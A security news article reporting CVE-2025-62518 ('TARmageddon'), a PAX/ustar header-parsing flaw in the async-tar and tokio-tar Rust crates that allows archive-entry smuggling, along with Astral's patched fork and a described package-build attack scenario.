Security researchers disclosed a high-severity vulnerability in the async-tar Rust library and its forks, including tokio-tar, that can lead to remote code execution in certain scenarios. The flaw is tracked as CVE-2025-62518 and carries a CVSS score of 8.1; it was codenamed TARmageddon by Edera, which reported the discovery in late August 2025.
Maintainers and researchers say the root cause is an inconsistent handling of PAX extended headers versus ustar headers when determining file boundaries inside TAR archives. Astral developer William Woodruff described the issue in a security advisory on GitHub, noting that the bug allows attackers to smuggle additional archive entries by exploiting that inconsistency.
When a PAX header specifies a file size that the ustar header records as zero, the parser can advance by the ustar size instead of the PAX size and fail to skip actual file data. That behavior can cause a nested TAR archive to be interpreted as extra entries in the outer archive, enabling file overwrite attacks and potentially arbitrary code execution, Edera said. The PAX/ustar format is documented by the Open Group here and PAX is used to store properties of member files.
The tokio-tar crate, which builds on the Tokio runtime, has not been actively maintained and was last updated on July 15, 2023, though it remains widely downloaded via crates.io (tokio-tar). Astral has published a remediation in astral-tokio-tar version 0.5.6 and users dependent on tokio-tar are advised to migrate to that fork until patches are available.
Researchers outlined a plausible attack in which an attacker uploads a crafted package whose outer TAR contains a legitimate pyproject.toml while a hidden inner TAR contains a malicious pyproject that hijacks the build backend and overwrites the real file during installation.